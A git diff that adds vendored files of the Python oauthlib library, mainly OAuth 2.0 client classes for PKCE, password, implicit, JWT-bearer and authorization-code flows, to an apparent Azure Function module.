creates a code verifier, "code_verifier", for each + OAuth 2.0 [RFC6749] Authorization Request, in the following manner: + + code_verifier = high-entropy cryptographic random STRING using the + unreserved characters [A-Z] / [a-z] / [0-9] / "-" / "." / "_" / "~" + from Section 2.3 of [RFC3986], with a minimum length of 43 characters + and a maximum length of 128 characters. + + .. _`Section 4.1`: https://tools.ietf.org/html/rfc7636#section-4.1 + """ + code_verifier = None + + if not length >= 43: + raise ValueError("Length must be greater than or equal to 43") + + if not length <= 128: + raise ValueError("Length must be less than or equal to 128") + + allowed_characters = re.compile('^[A-Zaa-z0-9-._~]') + code_verifier = secrets.token_urlsafe(length) + + if not re.search(allowed_characters, code_verifier): + raise ValueError("code_verifier contains invalid characters") + + self.code_verifier = code_verifier + + return code_verifier + + def create_code_challenge(self, code_verifier, code_challenge_method=None): + """Create PKCE **code_challenge** derived from the **code_verifier**. + + :param code_verifier: REQUIRED. The **code_verifier** generated from create_code_verifier(). + :param code_challenge_method: OPTIONAL. The method used to derive the **code_challenge**. Acceptable + values include "S256". DEFAULT is "plain". + + + The client then creates a code challenge derived from the code + verifier by using one of the following transformations on the code + verifier: + + plain + code_challenge = code_verifier + + S256 + code_challenge = BASE64URL-ENCODE(SHA256(ASCII(code_verifier))) + + If the client is capable of using "S256", it MUST use "S256", as + "S256" is Mandatory To Implement (MTI) on the server. Clients are + permitted to use "plain" only if they cannot support "S256" for some + technical reason and know via out-of-band configuration that the + server supports "plain". + + The plain transformation is for compatibility with existing + deployments and for constrained environments that can't use the S256 + transformation. + + .. _`Section 4.2`: https://tools.ietf.org/html/rfc7636#section-4.2 + """ + code_challenge = None + + if code_verifier == None: + raise ValueError("Invalid code_verifier") + + if code_challenge_method == None: + code_challenge_method = "plain" + self.code_challenge_method = code_challenge_method + code_challenge = code_verifier + self.code_challenge = code_challenge + + if code_challenge_method == "S256": + h = hashlib.sha256() + h.update(code_verifier.encode(encoding='ascii')) + sha256_val = h.digest() + code_challenge = bytes.decode(base64.urlsafe_b64encode(sha256_val)) + # replace '+' with '-', '/' with '_', and remove trailing '=' + code_challenge = code_challenge.replace("+", "-").replace("/", "_").replace("=", "") + self.code_challenge = code_challenge + + return code_challenge + + def _add_mac_token(self, uri, http_method='GET', body=None, + headers=None, token_placement=AUTH_HEADER, ext=None, **kwargs): + """Add a MAC token to the request authorization header. + + Warning: MAC token support is experimental as the spec is not yet stable. + """ + if token_placement != AUTH_HEADER: + raise ValueError("Invalid token placement.") + + headers = tokens.prepare_mac_header(self.access_token, uri, + self.mac_key, http_method, headers=headers, body=body, ext=ext, + hash_algorithm=self.mac_algorithm, **kwargs) + return uri, headers, body + + def _populate_attributes(self, response): + warnings.warn("Please switch to the public method " + "populate_token_attributes.", DeprecationWarning) + return self.populate_token_attributes(response) + + def populate_code_attributes(self, response): + """Add attributes from an auth code response to self.""" + + if 'code' in response: + self.code = response.get('code') + + def populate_token_attributes(self, response): + """Add attributes from a token exchange response to self.""" + + if 'access_token' in response: + self.access_token = response.get('access_token') + + if 'refresh_token' in response: + self.refresh_token = response.get('refresh_token') + + if 'token_type' in response: + self.token_type = response.get('token_type') + + if 'expires_in' in response: + self.expires_in = response.get('expires_in') + self._expires_at = time.time() + int(self.expires_in) + + if 'expires_at' in response: + try: + self._expires_at = int(response.get('expires_at')) + except: + self._expires_at = None + + if 'mac_key' in response: + self.mac_key = response.get('mac_key') + + if 'mac_algorithm' in response: + self.mac_algorithm = response.get('mac_algorithm') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/legacy_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/legacy_application.py new file mode 100644 index 0000000..b27af5a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/legacy_application.py @@ -0,0 +1,84 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from ..parameters import prepare_token_request +from .base import Client + + +class LegacyApplicationClient(Client): + + """A public client using the resource owner password and username directly. + + The resource owner password credentials grant type is suitable in + cases where the resource owner has a trust relationship with the + client, such as the device operating system or a highly privileged + application. The authorization server should take special care when + enabling this grant type, and only allow it when other flows are not + viable. + + The grant type is suitable for clients capable of obtaining the + resource owner's credentials (username and password, typically using + an interactive form). It is also used to migrate existing clients + using direct authentication schemes such as HTTP Basic or Digest + authentication to OAuth by converting the stored credentials to an + access token. + + The method through which the client obtains the resource owner + credentials is beyond the scope of this specification. The client + MUST discard the credentials once an access token has been obtained. + """ + + grant_type = 'password' + + def __init__(self, client_id, **kwargs): + super().__init__(client_id, **kwargs) + + def prepare_request_body(self, username, password, body='', scope=None, + include_client_id=False, **kwargs): + """Add the resource owner password and username to the request body. + + The client makes a request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format per `Appendix B`_ in the HTTP request entity-body: + + :param username: The resource owner username. + :param password: The resource owner password. + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + :param scope: The scope of the access request as described by + `Section 3.3`_. + :param include_client_id: `True` to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. False otherwise (default). + :type include_client_id: Boolean + :param kwargs: Extra credentials to include in the token request. + + If the client type is confidential or the client was issued client + credentials (or assigned other authentication requirements), the + client MUST authenticate with the authorization server as described + in `Section 3.2.1`_. + + The prepared body will include all provided credentials as well as + the ``grant_type`` parameter set to ``password``:: + + >>> from oauthlib.oauth2 import LegacyApplicationClient + >>> client = LegacyApplicationClient('your_id') + >>> client.prepare_request_body(username='foo', password='bar', scope=['hello', 'world']) + 'grant_type=password&username=foo&scope=hello+world&password=bar' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, body=body, username=username, + password=password, scope=scope, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/mobile_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/mobile_application.py new file mode 100644 index 0000000..0145abc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/mobile_application.py @@ -0,0 +1,174 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from ..parameters import parse_implicit_response, prepare_grant_uri +from .base import Client + + +class MobileApplicationClient(Client): + + """A public client utilizing the implicit code grant workflow. + + A user-agent-based application is a public client in which the + client code is downloaded from a web server and executes within a + user-agent (e.g. web browser) on the device used by the resource + owner. Protocol data and credentials are easily accessible (and + often visible) to the resource owner. Since such applications + reside within the user-agent, they can make seamless use of the + user-agent capabilities when requesting authorization. + + The implicit grant type is used to obtain access tokens (it does not + support the issuance of refresh tokens) and is optimized for public + clients known to operate a particular redirection URI. These clients + are typically implemented in a browser using a scripting language + such as JavaScript. + + As a redirection-based flow, the client must be capable of + interacting with the resource owner's user-agent (typically a web + browser) and capable of receiving incoming requests (via redirection) + from the authorization server. + + Unlike the authorization code grant type in which the client makes + separate requests for authorization and access token, the client + receives the access token as the result of the authorization request. + + The implicit grant type does not include client authentication, and + relies on the presence of the resource owner and the registration of + the redirection URI. Because the access token is encoded into the + redirection URI, it may be exposed to the resource owner and other + applications residing on the same device. + """ + + response_type = 'token' + + def prepare_request_uri(self, uri, redirect_uri=None, scope=None, + state=None, **kwargs): + """Prepare the implicit grant request URI. + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the "application/x-www-form-urlencoded" format, per `Appendix B`_: + + :param redirect_uri: OPTIONAL. The redirect URI must be an absolute URI + and it should have been registerd with the OAuth + provider prior to use. As described in `Section 3.1.2`_. + + :param scope: OPTIONAL. The scope of the access request as described by + Section 3.3`_. These may be any string but are commonly + URIs or various categories such as ``videos`` or ``documents``. + + :param state: RECOMMENDED. An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent back + to the client. The parameter SHOULD be used for preventing + cross-site request forgery as described in `Section 10.12`_. + + :param kwargs: Extra arguments to include in the request URI. + + In addition to supplied parameters, OAuthLib will append the ``client_id`` + that was provided in the constructor as well as the mandatory ``response_type`` + argument, set to ``token``:: + + >>> from oauthlib.oauth2 import MobileApplicationClient + >>> client = MobileApplicationClient('your_id') + >>> client.prepare_request_uri('https://example.com') + 'https://example.com?client_id=your_id&response_type=token' + >>> client.prepare_request_uri('https://example.com', redirect_uri='https://a.b/callback') + 'https://example.com?client_id=your_id&response_type=token&redirect_uri=https%3A%2F%2Fa.b%2Fcallback' + >>> client.prepare_request_uri('https://example.com', scope=['profile', 'pictures']) + 'https://example.com?client_id=your_id&response_type=token&scope=profile+pictures' + >>> client.prepare_request_uri('https://example.com', foo='bar') + 'https://example.com?client_id=your_id&response_type=token&foo=bar' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + """ + scope = self.scope if scope is None else scope + return prepare_grant_uri(uri, self.client_id, self.response_type, + redirect_uri=redirect_uri, state=state, scope=scope, **kwargs) + + def parse_request_uri_response(self, uri, state=None, scope=None): + """Parse the response URI fragment. + + If the resource owner grants the access request, the authorization + server issues an access token and delivers it to the client by adding + the following parameters to the fragment component of the redirection + URI using the "application/x-www-form-urlencoded" format: + + :param uri: The callback URI that resulted from the user being redirected + back from the provider to you, the client. + :param state: The state provided in the authorization request. + :param scope: The scopes provided in the authorization request. + :return: Dictionary of token parameters. + :raises: OAuth2Error if response is invalid. + + A successful response should always contain + + **access_token** + The access token issued by the authorization server. Often + a random string. + + **token_type** + The type of the token issued as described in `Section 7.1`_. + Commonly ``Bearer``. + + **state** + If you provided the state parameter in the authorization phase, then + the provider is required to include that exact state value in the + response. + + While it is not mandated it is recommended that the provider include + + **expires_in** + The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + **scope** + Providers may supply this in all responses but are required to only + if it has changed since the authorization request. + + A few example responses can be seen below:: + + >>> response_uri = 'https://example.com/callback#access_token=sdlfkj452&state=ss345asyht&token_type=Bearer&scope=hello+world' + >>> from oauthlib.oauth2 import MobileApplicationClient + >>> client = MobileApplicationClient('your_id') + >>> client.parse_request_uri_response(response_uri) + { + 'access_token': 'sdlfkj452', + 'token_type': 'Bearer', + 'state': 'ss345asyht', + 'scope': [u'hello', u'world'] + } + >>> client.parse_request_uri_response(response_uri, state='other') + Traceback (most recent call last): + File "", line 1, in + File "oauthlib/oauth2/rfc6749/__init__.py", line 598, in parse_request_uri_response + **scope** + File "oauthlib/oauth2/rfc6749/parameters.py", line 197, in parse_implicit_response + raise ValueError("Mismatching or missing state in params.") + ValueError: Mismatching or missing state in params. + >>> def alert_scope_changed(message, old, new): + ... print(message, old, new) + ... + >>> oauthlib.signals.scope_changed.connect(alert_scope_changed) + >>> client.parse_request_body_response(response_body, scope=['other']) + ('Scope has changed from "other" to "hello world".', ['other'], ['hello', 'world']) + + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + """ + scope = self.scope if scope is None else scope + self.token = parse_implicit_response(uri, state=state, scope=scope) + self.populate_token_attributes(self.token) + return self.token diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/service_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/service_application.py new file mode 100644 index 0000000..fdbc7db --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/service_application.py @@ -0,0 +1,189 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import time + +from oauthlib.common import to_unicode + +from ..parameters import prepare_token_request +from .base import Client + + +class ServiceApplicationClient(Client): + """A public client utilizing the JWT bearer grant. + + JWT bearer tokes can be used to request an access token when a client + wishes to utilize an existing trust relationship, expressed through the + semantics of (and digital signature or keyed message digest calculated + over) the JWT, without a direct user approval step at the authorization + server. + + This grant type does not involve an authorization step. It may be + used by both public and confidential clients. + """ + + grant_type = 'urn:ietf:params:oauth:grant-type:jwt-bearer' + + def __init__(self, client_id, private_key=None, subject=None, issuer=None, + audience=None, **kwargs): + """Initalize a JWT client with defaults for implicit use later. + + :param client_id: Client identifier given by the OAuth provider upon + registration. + + :param private_key: Private key used for signing and encrypting. + Must be given as a string. + + :param subject: The principal that is the subject of the JWT, i.e. + which user is the token requested on behalf of. + For example, ``foo@example.com. + + :param issuer: The JWT MUST contain an "iss" (issuer) claim that + contains a unique identifier for the entity that issued + the JWT. For example, ``your-client@provider.com``. + + :param audience: A value identifying the authorization server as an + intended audience, e.g. + ``https://provider.com/oauth2/token``. + + :param kwargs: Additional arguments to pass to base client, such as + state and token. See ``Client.__init__.__doc__`` for + details. + """ + super().__init__(client_id, **kwargs) + self.private_key = private_key + self.subject = subject + self.issuer = issuer + self.audience = audience + + def prepare_request_body(self, + private_key=None, + subject=None, + issuer=None, + audience=None, + expires_at=None, + issued_at=None, + extra_claims=None, + body='', + scope=None, + include_client_id=False, + **kwargs): + """Create and add a JWT assertion to the request body. + + :param private_key: Private key used for signing and encrypting. + Must be given as a string. + + :param subject: (sub) The principal that is the subject of the JWT, + i.e. which user is the token requested on behalf of. + For example, ``foo@example.com. + + :param issuer: (iss) The JWT MUST contain an "iss" (issuer) claim that + contains a unique identifier for the entity that issued + the JWT. For example, ``your-client@provider.com``. + + :param audience: (aud) A value identifying the authorization server as an + intended audience, e.g. + ``https://provider.com/oauth2/token``. + + :param expires_at: A unix expiration timestamp for the JWT. Defaults + to an hour from now, i.e. ``time.time() + 3600``. + + :param issued_at: A unix timestamp of when the JWT was created. + Defaults to now, i.e. ``time.time()``. + + :param extra_claims: A dict of additional claims to include in the JWT. + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + + :param scope: The scope of the access request. + + :param include_client_id: `True` to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. False otherwise (default). + :type include_client_id: Boolean + + :param not_before: A unix timestamp after which the JWT may be used. + Not included unless provided. * + + :param jwt_id: A unique JWT token identifier. Not included unless + provided. * + + :param kwargs: Extra credentials to include in the token request. + + Parameters marked with a `*` above are not explicit arguments in the + function signature, but are specially documented arguments for items + appearing in the generic `**kwargs` keyworded input. + + The "scope" parameter may be used, as defined in the Assertion + Framework for OAuth 2.0 Client Authentication and Authorization Grants + [I-D.ietf-oauth-assertions] specification, to indicate the requested + scope. + + Authentication of the client is optional, as described in + `Section 3.2.1`_ of OAuth 2.0 [RFC6749] and consequently, the + "client_id" is only needed when a form of client authentication that + relies on the parameter is used. + + The following non-normative example demonstrates an Access Token + Request with a JWT as an authorization grant (with extra line breaks + for display purposes only): + + .. code-block: http + + POST /token.oauth2 HTTP/1.1 + Host: as.example.com + Content-Type: application/x-www-form-urlencoded + + grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer + &assertion=eyJhbGciOiJFUzI1NiJ9. + eyJpc3Mi[...omitted for brevity...]. + J9l-ZhwP[...omitted for brevity...] + + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + import jwt + + key = private_key or self.private_key + if not key: + raise ValueError('An encryption key must be supplied to make JWT' + ' token requests.') + claim = { + 'iss': issuer or self.issuer, + 'aud': audience or self.audience, + 'sub': subject or self.subject, + 'exp': int(expires_at or time.time() + 3600), + 'iat': int(issued_at or time.time()), + } + + for attr in ('iss', 'aud', 'sub'): + if claim[attr] is None: + raise ValueError( + 'Claim must include %s but none was given.' % attr) + + if 'not_before' in kwargs: + claim['nbf'] = kwargs.pop('not_before') + + if 'jwt_id' in kwargs: + claim['jti'] = kwargs.pop('jwt_id') + + claim.update(extra_claims or {}) + + assertion = jwt.encode(claim, key, 'RS256') + assertion = to_unicode(assertion) + + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, + body=body, + assertion=assertion, + scope=scope, + **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/web_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/web_application.py new file mode 100644 index 0000000..f503aa9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/web_application.py @@ -0,0 +1,222 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import warnings + +from ..parameters import ( + parse_authorization_code_response, prepare_grant_uri, + prepare_token_request, +) +from .base import Client + + +class WebApplicationClient(Client): + + """A client utilizing the authorization code grant workflow. + + A web application is a confidential client running on a web + server. Resource owners access the client via an HTML user + interface rendered in a user-agent on the device used by the + resource owner. The client credentials as well as any access + token issued to the client are stored on the web server and are + not exposed to or accessible by the resource owner. + + The authorization code grant type is used to obtain both access + tokens and refresh tokens and is optimized for confidential clients. + As a redirection-based flow, the client must be capable of + interacting with the resource owner's user-agent (typically a web + browser) and capable of receiving incoming requests (via redirection) + from the authorization server. + """ + + grant_type = 'authorization_code' + + def __init__(self, client_id, code=None, **kwargs): + super().__init__(client_id, **kwargs) + self.code = code + + def prepare_request_uri(self, uri, redirect_uri=None, scope=None, + state=None, code_challenge=None, code_challenge_method='plain', **kwargs): + """Prepare the authorization code request URI + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the "application/x-www-form-urlencoded" format, per `Appendix B`_: + + :param redirect_uri: OPTIONAL. The redirect URI must be an absolute URI + and it should have been registerd with the OAuth + provider prior to use. As described in `Section 3.1.2`_. + + :param scope: OPTIONAL. The scope of the access request as described by + Section 3.3`_. These may be any string but are commonly + URIs or various categories such as ``videos`` or ``documents``. + + :param state: RECOMMENDED. An opaque value used by the client to maintain + state between the request and callback. The authorization + server includes this value when redirecting the user-agent back + to the client. The parameter SHOULD be used for preventing + cross-site request forgery as described in `Section 10.12`_. + + :param code_challenge: OPTIONAL. PKCE parameter. REQUIRED if PKCE is enforced. + A challenge derived from the code_verifier that is sent in the + authorization request, to be verified against later. + + :param code_challenge_method: OPTIONAL. PKCE parameter. A method that was used to derive code challenge. + Defaults to "plain" if not present in the request. + + :param kwargs: Extra arguments to include in the request URI. + + In addition to supplied parameters, OAuthLib will append the ``client_id`` + that was provided in the constructor as well as the mandatory ``response_type`` + argument, set to ``code``:: + + >>> from oauthlib.oauth2 import WebApplicationClient + >>> client = WebApplicationClient('your_id') + >>> client.prepare_request_uri('https://example.com') + 'https://example.com?client_id=your_id&response_type=code' + >>> client.prepare_request_uri('https://example.com', redirect_uri='https://a.b/callback') + 'https://example.com?client_id=your_id&response_type=code&redirect_uri=https%3A%2F%2Fa.b%2Fcallback' + >>> client.prepare_request_uri('https://example.com', scope=['profile', 'pictures']) + 'https://example.com?client_id=your_id&response_type=code&scope=profile+pictures' + >>> client.prepare_request_uri('https://example.com', code_challenge='kjasBS523KdkAILD2k78NdcJSk2k3KHG6') + 'https://example.com?client_id=your_id&response_type=code&code_challenge=kjasBS523KdkAILD2k78NdcJSk2k3KHG6' + >>> client.prepare_request_uri('https://example.com', code_challenge_method='S256') + 'https://example.com?client_id=your_id&response_type=code&code_challenge_method=S256' + >>> client.prepare_request_uri('https://example.com', foo='bar') + 'https://example.com?client_id=your_id&response_type=code&foo=bar' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2 + .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12 + """ + scope = self.scope if scope is None else scope + return prepare_grant_uri(uri, self.client_id, 'code', + redirect_uri=redirect_uri, scope=scope, state=state, code_challenge=code_challenge, + code_challenge_method=code_challenge_method, **kwargs) + + def prepare_request_body(self, code=None, redirect_uri=None, body='', + include_client_id=True, code_verifier=None, **kwargs): + """Prepare the access token request body. + + The client makes a request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format in the HTTP request entity-body: + + :param code: REQUIRED. The authorization code received from the + authorization server. + + :param redirect_uri: REQUIRED, if the "redirect_uri" parameter was included in the + authorization request as described in `Section 4.1.1`_, and their + values MUST be identical. + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + + :param include_client_id: `True` (default) to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in `Section 3.2.1`_. + :type include_client_id: Boolean + + :param code_verifier: OPTIONAL. A cryptographically random string that is used to correlate the + authorization request to the token request. + + :param kwargs: Extra parameters to include in the token request. + + In addition OAuthLib will add the ``grant_type`` parameter set to + ``authorization_code``. + + If the client type is confidential or the client was issued client + credentials (or assigned other authentication requirements), the + client MUST authenticate with the authorization server as described + in `Section 3.2.1`_:: + + >>> from oauthlib.oauth2 import WebApplicationClient + >>> client = WebApplicationClient('your_id') + >>> client.prepare_request_body(code='sh35ksdf09sf') + 'grant_type=authorization_code&code=sh35ksdf09sf' + >>> client.prepare_request_body(code_verifier='KB46DCKJ873NCGXK5GD682NHDKK34GR') + 'grant_type=authorization_code&code_verifier=KB46DCKJ873NCGXK5GD682NHDKK34GR' + >>> client.prepare_request_body(code='sh35ksdf09sf', foo='bar') + 'grant_type=authorization_code&code=sh35ksdf09sf&foo=bar' + + `Section 3.2.1` also states: + In the "authorization_code" "grant_type" request to the token + endpoint, an unauthenticated client MUST send its "client_id" to + prevent itself from inadvertently accepting a code intended for a + client with a different "client_id". This protects the client from + substitution of the authentication code. (It provides no additional + security for the protected resource.) + + .. _`Section 4.1.1`: https://tools.ietf.org/html/rfc6749#section-4.1.1 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + code = code or self.code + if 'client_id' in kwargs: + warnings.warn("`client_id` has been deprecated in favor of " + "`include_client_id`, a boolean value which will " + "include the already configured `self.client_id`.", + DeprecationWarning) + if kwargs['client_id'] != self.client_id: + raise ValueError("`client_id` was supplied as an argument, but " + "it does not match `self.client_id`") + + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + return prepare_token_request(self.grant_type, code=code, body=body, + redirect_uri=redirect_uri, code_verifier=code_verifier, **kwargs) + + def parse_request_uri_response(self, uri, state=None): + """Parse the URI query for code and state. + + If the resource owner grants the access request, the authorization + server issues an authorization code and delivers it to the client by + adding the following parameters to the query component of the + redirection URI using the "application/x-www-form-urlencoded" format: + + :param uri: The callback URI that resulted from the user being redirected + back from the provider to you, the client. + :param state: The state provided in the authorization request. + + **code** + The authorization code generated by the authorization server. + The authorization code MUST expire shortly after it is issued + to mitigate the risk of leaks. A maximum authorization code + lifetime of 10 minutes is RECOMMENDED. The client MUST NOT + use the authorization code more than once. If an authorization + code is used more than once, the authorization server MUST deny + the request and SHOULD revoke (when possible) all tokens + previously issued based on that authorization code. + The authorization code is bound to the client identifier and + redirection URI. + + **state** + If the "state" parameter was present in the authorization request. + + This method is mainly intended to enforce strict state checking with + the added benefit of easily extracting parameters from the URI:: + + >>> from oauthlib.oauth2 import WebApplicationClient + >>> client = WebApplicationClient('your_id') + >>> uri = 'https://example.com/callback?code=sdfkjh345&state=sfetw45' + >>> client.parse_request_uri_response(uri, state='sfetw45') + {'state': 'sfetw45', 'code': 'sdfkjh345'} + >>> client.parse_request_uri_response(uri, state='other') + Traceback (most recent call last): + File "", line 1, in + File "oauthlib/oauth2/rfc6749/__init__.py", line 357, in parse_request_uri_response + back from the provider to you, the client. + File "oauthlib/oauth2/rfc6749/parameters.py", line 153, in parse_authorization_code_response + raise MismatchingStateError() + oauthlib.oauth2.rfc6749.errors.MismatchingStateError + """ + response = parse_authorization_code_response(uri, state=state) + self.populate_code_attributes(response) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__init__.py new file mode 100644 index 0000000..ce6276c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__init__.py @@ -0,0 +1,17 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from .authorization import AuthorizationEndpoint +from .introspect import IntrospectEndpoint +from .metadata import MetadataEndpoint +from .pre_configured import ( + BackendApplicationServer, LegacyApplicationServer, MobileApplicationServer, + Server, WebApplicationServer, +) +from .resource import ResourceEndpoint +from .revocation import RevocationEndpoint +from .token import TokenEndpoint diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..42aef60 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc new file mode 100644 index 0000000..311d8b4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/authorization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..d8ec53c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc new file mode 100644 index 0000000..0228915 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/introspect.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc new file mode 100644 index 0000000..77f2f4d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/metadata.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc new file mode 100644 index 0000000..66b1c27 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/pre_configured.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/endpoints/__pycache__/resource.cpython-39.pyc new file mode 100644 index 0000000..10b3c05 Binary files 